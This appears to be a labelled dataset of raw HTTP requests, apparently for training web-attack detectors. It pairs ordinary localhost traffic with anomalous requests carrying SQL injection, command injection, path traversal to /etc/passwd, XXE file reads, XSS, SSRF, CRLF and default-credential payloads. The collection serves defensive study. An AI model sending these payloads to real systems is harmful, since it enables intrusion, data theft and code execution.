raw_request stringlengths 12 206k | label stringclasses 2
values | attack_type stringclasses 24
values |
|---|---|---|
GET /Li4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vLi4vZXRjL3Bhc3N3ZA== HTTP/1.1
Host: localhost:3000
User-Agent: Fuzz Faster U Fool v2.1.0
Accept-Encoding: gzip | anomalous | Local_File_Inclusion |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Enc... | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d074080f-a611-4ddf-ab00-ed0377e783d2 | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: passthru($_GET[c], '%0dr'%0d);
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *... | anomalous | Remote_Code_Execution |
GET /rest/products/search?q=glass&cache_id=c6260a81-e895-4741-aa7d-67fc0b83df21 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: c6... | normal | null |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1%20dUpc%2C%3BWAITFOR%20DELAY%20%270%3A0%3A5%27%20kSuf; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.1... | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 64124140-d474-4a1a-9bd5-1b092a360c15 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, d... | anomalous | SQL_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: %20ping -n 7 127.0.0.1#
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
... | anomalous | Command_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Directory_Traversal |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, defl... | anomalous | Server-Side_Request_Forgery |
GET /rest/products/search?q=glass&cache_id=d0730271-14e4-4b73-8b99-9fe6ad3c9054 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: d0... | normal | null |
GET /rest/products/search?q=%74%65%73%74%22%29%2F%2A%21%41%73%2A%2F%43%63%78%42%2F%2A%21%77%48%45%52%45%2A%2F%36%30%37%39%3D%36%30%37%39%2F%2A%21%41%4E%64%2A%2F%65%4C%74%28%33%39%34%39%2F%2A%21%62%45%74%77%45%65%4E%2A%2F%33%39%34%39%2F%2A%21%41%4E%64%2A%2F%33%39%34%39%2C%36%37%33%34%29%2D%2D%2F%2A%2A%2F%71%4B%67%76 HTT... | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: e17fec90-e954-4294-a24e-cbdacedef60b | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY leak SYSTEM "file://\/var\/log\/nginx\/access.log"> ]><log>&leak;</log>
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,imag... | anomalous | XML_External_Entity |
GET /vulnerabilities/sqli/?id=| ls -l /etc/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;... | anomalous | Command_Injection |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=331mt6t74ifgbsopqhr92feud2; path=/;security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/
Host: localhost
Accept: */*... | anomalous | SQL Injection |
GET /?ref=2b3f6ee0-215e-4036-891c-107addb83192&session_token=8992 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 2b3f6ee0-215e-40... | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: a07211b2-8610-4059-8261-94c9e0bab2dd | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | HTML_Injection |
GET /?ref=7302747c-0600-4134-82c3-d713b0673897&session_token=7119 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 7302747c-0600-41... | normal | null |
GET /rest/products/search?q=orange&cache_id=7df518f2-8d2b-489b-ba16-77af52d53a74 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 7... | normal | null |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/"))) AND (SELECT (CASE WHEN (5433=3... | anomalous | SQL Injection |
GET /rest/products/search?q=..%c1%9c..%c1%9c..%c1%9c{FILE} HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q... | anomalous | Directory_Traversal |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/")) AS iyaR WHERE 6788=6788 RLIKE (... | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept... | anomalous | XML_External_Entity |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: %22 or '8604'='8604 --
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, utf-8;q=0.5, *;q=0.5
A... | anomalous | SQL_Injection |
GET /rest/products/search?q=sale&cache_id=dcf84252-d112-470c-9551-5a2e19085765 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: dcf... | normal | null |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15")) AND 1594=(SELECT COUNT(*) FROM sysusers AS sys1,sysusers AS sys2,sysusers AS sy... | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=dict:///%5c/127.0.0.0:3389 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*... | anomalous | Server-Side_Request_Forgery |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 39b77fb8-2392-4875-9910-7d821381ac42 | normal | null |
GET /cgi-bin/kerbynet?Section=NoAuthREQ&Action=x509List&type=*%22;/root/kerbynet.cgi/scripts/getkey%20../../../etc/passwd;%22 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 12_0) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/15.6 Safari/605.1.15
Connection: close
Accept: */*
Accept-... | anomalous | Advanced Vulnerability Scan |
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20TNKBDH%20%3E%20/tmp/CPXGLC.txt%29%3BYUI=%24%28cat%20/tmp/CPXGLC.txt%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%206%20-eq%20%24%7BYUI1%7D%20%5D%3Bthen%20sleep%201%3Bfi%27 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproj... | anomalous | Command Injection |
GET /rest/products/search?q=fruit&cache_id=4a41d711-6c0e-47e4-a489-6ea2bd2ba116 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 4a... | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: %3Ffile%3D%250DSet-Cookie%3Acrlf%3Dinjection
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Accept-Charset: utf-8, ... | anomalous | CRLF_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
... | anomalous | XML_External_Entity |
GET /rest/products/search?q=sale&cache_id=2a68760f-152f-4bfb-8d75-740775d50b18 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 2a6... | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | Directory_Traversal |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; path=/;security=low%22%29%29%20OR%202143%3DDBMS_PIPE.RECEIVE_MESSAGE%28CHR%2877%29%7C%7CCHR%28101%29%7C%7CCHR%28108%29%7C%7CCHR%28119%29%2C5%29--
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15... | anomalous | SQL Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ac60db74-9f77-406c-a3dc-cc62f848ca1c | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | Cross-Site_Scripting |
GET /?ref=3215ff27-01d4-44dc-b7d2-59cad4ae3f9c&session_token=7200 HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 3215ff27-01d4-44... | normal | null |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: <?xml version="1.0" encoding="utf-8"?><!DOCTYPE foo [<!ENTITY data SYSTEM "file://C:/xampp/apache/logs/access.log "> ]><response>&data;</response>
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/pla... | anomalous | XML_External_Entity |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPad; CPU OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q... | anomalous | Server-Side_Template_Injection |
GET /api/Challenges?page=drink HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 14_6 like Mac OS X) AppleWebKit/605.1.15
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control... | normal | null |
GET /login.php HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.11 Safari/605.1.15
Referer: http://localhost/vulnerabilities/sqli/) WHERE 1897=1897 OR 2996=(SELECT C... | anomalous | SQL Injection |
GET /rest/products/search?q=%20%3BYUI=%24%28echo%20SBEVQV%29%3BYUI1=%24%7B%23YUI%7D%3Bif%20%5B%205%20-eq%20%24YUI1%20%5D%3Bthen%20sleep%201%3Bfi%20%23 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
User-Agent: commix/v4.2.dev1 (https://commixproject.com)
Referer: http://localhost:3000/rest/products/search
Hos... | anomalous | Command Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Safari/605.1.15
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Acce... | anomalous | SQL_Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, d... | anomalous | Cross-Site_Request_Forgery |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Cross-Site_Scripting |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-g... | anomalous | HTML_Injection |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding:... | anomalous | Cross-Site_Request_Forgery |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Cross-Site_Scripting |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%29%29%29%20AND%20%28SELECT%20%28CASE%20WHEN%20%282147%3D5746%29%20THEN%20NULL%20ELSE%20CTXSYS.DRITHSX.SN%281%2C2147%29%20END%29%20FROM%20DUAL%29%20IS%20NULL%20AND%20%28%28%281428%3D1... | anomalous | SQL Injection |
GET /vulnerabilities/sqli/?id=<input type="text" value=``<div/onmouseover='alert(1)'>X</div> HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image... | anomalous | Cross-Site_Scripting |
GET /vulnerabilities/sqli/?id=http://XY>.7d8T\205pZM@472.314.470.462 HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xm... | anomalous | Open_Redirect |
GET /user/login HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Connection: close
Accept-Encoding: gzip | anomalous | Advanced Vulnerability Scan |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzi... | anomalous | Cross-Site_Scripting |
GET /vulnerabilities/sqli/?id=1 HTTP/1.1
User-Agent: ..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8s..../%c1%8sboot.ini
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
Acce... | anomalous | Directory_Traversal |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 0e75abd5-6f40-4742-ae47-2632bf64c744 | normal | null |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%27%29%29%20AS%20GZIr%20WHERE%202104%3D2104%20WAITFOR%20DELAY%20%270%3A0%3A5%27--%20KhYh
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like ... | anomalous | SQL Injection |
GET /search?q=lemon HTTP/1.1
Host: 127.0.0.1:3000
User-Agent: Mozilla/5.0 (Android 11; Mobile; rv:89.0) Gecko/89.0 Firefox/89.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Cache-Control: max-age=0
Referer: ... | normal | null |
GET /rest/products/search?q=cup&cache_id=ddc29ca2-534c-4cca-80c7-40a60422e8ed HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: ddc2... | normal | null |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/111.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: 50b43059-1104-4c59-bc6c-bff4e401a755 | normal | null |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip,... | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 17_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.1 Mobile/15E148 Safari/604.1
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/... | anomalous | SQL_Injection |
GET /vulnerabilities/sqli/?id=1&Submit=Submit HTTP/1.1
Cache-Control: no-cache
Cookie: PHPSESSID=t2q46mrlmgtgitnc7esjvqckl1; security=low%2C%28SELECT%20%28CASE%20WHEN%20%287573%3D7573%29%20THEN%20%28SELECT%20COUNT%28%2A%29%20FROM%20GENERATE_SERIES%281%2C5000000%29%29%20ELSE%201%2F%28SELECT%200%29%20END%29%29
User-Agent... | anomalous | SQL Injection |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Cross-Site_Request_Forgery |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Edge/120.0.0.0
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x... | anomalous | Directory_Traversal |
POST /vulnerabilities/sqli/ HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.8 (like Gecko)
Pragma: no-cache
Cache-Control: no-cache
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: x-gzip, x-deflate, gzip, deflate
... | anomalous | Server-Side_Template_Injection |
GET / HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.0.0 Safari/537.36
Accept-Encoding: gzip, deflate, br
Accept: */*
Connection: keep-alive
X-Request-ID: cadcbd28-9190-497d-93d3-36ff7483511e | normal | null |
POST /login/system HTTP/1.1
Host: localhost:3000
User-Agent: Mozilla/5.0 (ZZ; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/140.0.0.0 Safari/537.36
Content-Length: 52
Content-Type: application/json
Accept-Encoding: gzip
Connection: close
{"name":"admin","password":"admin","checkbox":false} | anomalous | Advanced Vulnerability Scan |
